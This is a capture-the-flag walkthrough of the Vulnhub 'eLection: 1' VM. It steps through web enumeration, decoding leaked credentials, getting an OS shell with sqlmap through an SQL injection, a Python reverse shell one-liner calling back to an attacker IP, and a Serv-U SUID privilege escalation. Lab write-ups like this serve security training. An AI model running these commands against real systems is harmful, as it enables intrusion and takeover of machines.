Vulnhub - ELECTION: 1
It is an OSCP-like VM, Medium Level difficulty.
This is eLection: 1 from Vulnhub.
SSH and HTTP only; simple.
robots.txt has four disallowed entries:
- user, and
1 through 3 actually don’t exist, but election does. It’s a Web Based Election System from tripath. Searchsploit says there’s an SQL injection, but it’s authenticated so we’d need some creds.
I run a gobuster:
root@kali:/opt/vulnhub/election# gobuster dir -u http://192.168.1.138/election/ -w /usr/share/seclists/Discovery/Web-Content/big.txt -x js,txt,html,php
And it turns up some interesting things, including phpMyAdmin. But I ignore that and focus on card.php. It says:
00110000 00110001 00110001 00110001 00110000 00110001 etc etc
I take it to CyberChef and run it through from binary twice - we get some creds!
These are credentials for http://192.168.1.138/election/admin and with that we can login, capture a certain request and run sqlmap.
root@kali:/opt/vulnhub/election# sqlmap -r getcandidate --level=5 --risk=3 --os-shell -p id
This commands gets an os shell through sqlmap. We can get a normal reverse shell with a second listener and our old friend pentestmonkey:
os-shell> python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.77",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
We’re on the box.
So we’re on as www-data. I run linpeas, because I always do. This line catches my eye:
/var/www/html/election/admin/logs/system.log:[2020-01-01 00:00:00] Assigned Password for the user love: P@$$w0rd@123
We can su love. Or SSH in. Or both; whatever.
Love can’t run sudo. I search for SUID binaries:
love@election:/$ find / -perm -u=s -type f 2>/dev/null
And this line stands out:
What is Serv-U? I’ve never heard of it. Google leads me to this writeup of CVE-2019-12181, which is a privilege escalation for Serv-U FTP Server.
The exploit code is on github but it’s pretty simple:
I compile it, run it and …. root.